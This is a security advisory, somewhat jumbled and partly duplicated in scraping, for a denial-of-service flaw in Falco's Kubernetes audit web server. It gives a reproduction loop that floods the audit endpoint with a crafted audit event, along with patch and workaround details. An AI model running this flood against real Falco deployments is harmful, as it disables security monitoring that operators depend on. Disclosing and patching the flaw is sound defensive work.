This vulnerability allows external actors to shut down Falco.
Anyone running Falco is impacted.
To reproduce the issue continuously send requests towards the Kubernetes audit endpoint.
while true; do \
curl http://127.0.0.1:8765/k8s-audit \
--data '{"kind":"Event","apiVersion":"audit.k8s.io/v1beta1","metadata":{"creationTimestamp":"2018-10-25T13:58:49Z"},"level":"Request","timestamp":"2018-10-25T13:58:49Z","auditID":"841d3e6d-90d2-43df-8da4-684738bee3d5","stage":"ResponseComplete","requestURI":"/api/v1/namespaces","verb":"create","user":{"username":"system:anonymous","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.99.1"],"objectRef":{"resource":"namespaces","name":"foo","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestObject":{"kind":"Namespace","apiVersion":"v1","metadata":{"name":"foo","creationTimestamp":null},"spec":{},"status":{"phase":"Active"}},"requestReceivedTimestamp":"2018-10-25T13:58:49.730588Z","stageTimestamp":"2018-10-25T13:58:49.736141Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}' \
-H "Content-Type: application/json"; \
doneIn case users can not disable the Kubernetes Audit web server there is not a workaround since the Lua state is not thread-safe by design.
NONE.
Impact
What kind of vulnerability is it? Who is impacted?
This vulnerability allows external actors to shut down Falco.
Anyone running Falco is impacted.
To reproduce the issue continuously send requests towards the Kubernetes audit endpoint.
Assuming:
Example:
Patches
Has the problem been patched? What versions should users upgrade to?
The problem has been addressed by #867 on Sep 30, 2019.
Users should upgrade to version 0.18.0 or later.
Workarounds
Is there a way for users to fix or remediate the vulnerability without upgrading?
Users who don't need to detect Kubernetes Audit Events can disable the embedded web server from the Falco configuration.
In case users can not disable the Kubernetes Audit web server there is not a workaround since the Lua state is not thread-safe by design.
A version upgrade to a Falco version greater than 0.18.0 is necessary and strongly recommended.
References
Are there any links users can visit to find out more?
NONE.
For more information
If you have any questions or comments about this advisory: